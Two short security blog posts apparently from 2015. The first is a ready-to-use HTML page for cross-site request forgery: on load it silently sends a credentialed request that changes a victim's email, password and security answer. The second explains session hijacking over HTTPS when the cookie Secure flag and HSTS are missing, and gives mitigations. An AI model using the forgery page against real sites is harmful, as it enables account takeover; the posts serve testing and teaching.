Sunday 18 October 2015

XHR CSRF

Below code can be used to perform CSRF in XHR.

<html>
<head>
<script>
function loadXMLDoc()
{
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST","https://example.com",true);
xmlhttp.withCredentials = "true";
xmlhttp.send("{\"emailAddress\":\"abcd.92@gmail.com\",\"password\":\"dqazxsw123\",\"securityQuestion\":\"In what city or town was your first job?\",\"securityAnswer\":\"Bangalore\",\"notifyUpdates\":\"true\"}"); //Data
window.close();
}
</script>
</head>
<body onload="javascript:loadXMLDoc()">
Action Performed
</body>
</html>
Posted by at No comments:
Labels: , ,

Sunday 4 October 2015

SESSION HIJACKING in HTTPS Channel


Application over HTTPS channel without "SECURE" flag cookie is vulnerable to Session Hijacking.

Condition:
1) User must be authenticated  [Like CSRF]
2) Secure flag not set
3) HSTS not implemented

Example Domain: https://example.com

Steps to Attack:

  1. Attacker forces the victim to click "http://example.com"(via email or other source), the 1st request to the server will be in clear text with all the cookie for that domain(example.com).
  2. Then the server will redirect HTTP request to HTTPS. 
  3. Attacker can sniff the 1st request and get the cookie.

Mitigation:
  1. Set "SECURE" flag for all session cookie
  2. Implement HSTS (HTTP Strict-Transport-Security)
Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)